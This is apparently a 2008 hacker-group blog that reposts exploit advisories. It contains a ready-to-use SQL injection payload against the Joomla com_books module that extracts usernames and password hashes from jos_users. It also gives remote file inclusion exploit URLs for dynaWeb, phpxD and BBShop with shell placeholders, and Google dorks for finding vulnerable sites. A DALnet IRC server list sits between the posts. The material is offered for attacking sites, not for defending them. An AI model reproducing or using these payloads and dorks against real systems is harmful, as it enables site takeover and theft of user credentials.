Friday, November 28, 2008

Joomla - com_books SQL Injection

#################################################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Module_Name: com_books
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_books"
#################################################################################

#[~] Example:
index.php?option=com_books&task=book_details&book_id=[exploit]



#[~]Exploit:
-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users--


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-11-11]



VIVA INDONESIAN CODER TEAM

Monday, November 17, 2008

DALnet Servers

CA Servers

maple.ix.ca.dal.net
toronto.on.ca.dal.net



EU Servers

arcor.de.eu.dal.net
brain.hub.eu.dal.net
gaston.se.eu.dal.net
genesis-r.uk.eu.dal.net
matrix.de.eu.dal.net
mozilla.se.eu.dal.net
powertech.no.eu.dal.net
waffle.ix.eu.dal.net



AS Servers
hotspeed.sg.as.dal.net
mesra.kl.my.dal.net



US Servers

aeon.nj.us.dal.net
broadway.ny.us.dal.net
hollywood.ix.us.dal.net
jade.va.us.dal.net
jingo.ix.us.dal.net
loyalty.ix.us.dal.net
masters.ix.us.dal.net
novel.fl.us.dal.net
punch.va.us.dal.net
rangers.ix.us.dal.net
redemption.ix.us.dal.net
riga-r.ca.us.dal.net
rumble.fl.us.dal.net
serenity.ix.us.dal.net
soho.ix.us.dal.net
swiftco.wa.us.dal.net


dal.net



Saturday, November 15, 2008

dynaWeb - Remote File Include

#############################################################
# Application Name : dynaWeb
# Vulnerable Type : Remote File Include
# Infection : Access to the site and the server can be obtained.
# Bug Fix Advice : Undefined values must be defined.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################

< -- bug code start -- >

http://Site/Path/siteQuery.php?sitePath=[Shell]

< -- bug code end of -- >





VIVA INDONESIAN CODER TEAM
Get The Code and Feel The SOUL

phpxD - Remote File Include

#############################################################
# Application Name : phpxD
# Vulnerable Type : Remote File Include
# Infection : Access to the site and the server can be obtained.
# Bug Fix Advice : Undefined values must be defined.
# author : code Hunters TIM
# Script Download : sourceforge.net
#############################################################


Vuln Path :

http://Site/Path/include/parser.php?path=[Shell]
http://Site/Path/include/dtd.php?path=[Shell]
http://site/path/include/dom.php?path=[shell]






BBShop 4.5 Final - Multiple RFI

[o] BBShop 4.5 Final Multiple Remote File Inclusion Vulnerability
Software : BBShop version 4.5
Vendor : http://zzem.co.kr/
Developer : The Win
Author : NoGe

[o] Vulnerable file
bbshop/shop/index.php
bbshop/shop/main.php
bbshop/admin/admin.php
bbshop/admin/index.php
All of these files are affected by the _shop_path variable.

[o] Exploit
http://localhost/[path]/bbshop/shop/index.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/shop/main.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/admin.php?_shop_path=[evilcode]
http://localhost/[path]/bbshop/admin/index.php?_shop_path=[evilcode]

[o] Dork
"bbshop"

NoGe.ZoNe

